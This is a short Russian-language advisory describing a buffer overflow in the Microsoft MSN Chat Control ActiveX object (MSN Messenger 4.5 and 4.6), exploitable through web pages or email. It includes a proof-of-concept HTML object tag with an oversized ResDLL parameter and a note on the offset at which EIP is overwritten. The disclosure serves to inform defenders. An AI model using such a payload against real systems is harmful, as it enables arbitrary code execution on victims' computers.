Microsoft MSN Chat Control - ActiveX объект, обеспечивающий функциональные возможности чата. Объект поставляется по умолчанию со многими продуктами Microsoft, включая последние версии MSN Messenger.

Microsoft MSN Chat Control уязвим к переполнению буфера и выполнению произвольного кода. Эта уязвимость может эксплуатироваться при просмотре Web
страниц или электронного сообщения.

Пример:

<object classid="clsid:9088E688-063A-4806-A3DB-6522712FC061" width="455"
height="523">
<param name="_cx" value="12039">
<param name="_cy" value="13838">
<param name="BackColor" value="50331647">
<param name="ForeColor" value="43594547">
<param name="RedirectURL" value="">
<param name="ResDLL" value="AAAAAAA[27,257 bytes is where the EIP starts]">
</object>

Уязвимость обнаружена в Microsoft MSN Chat Control (Microsoft MSN Messenger 4.5
и 4.6).

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии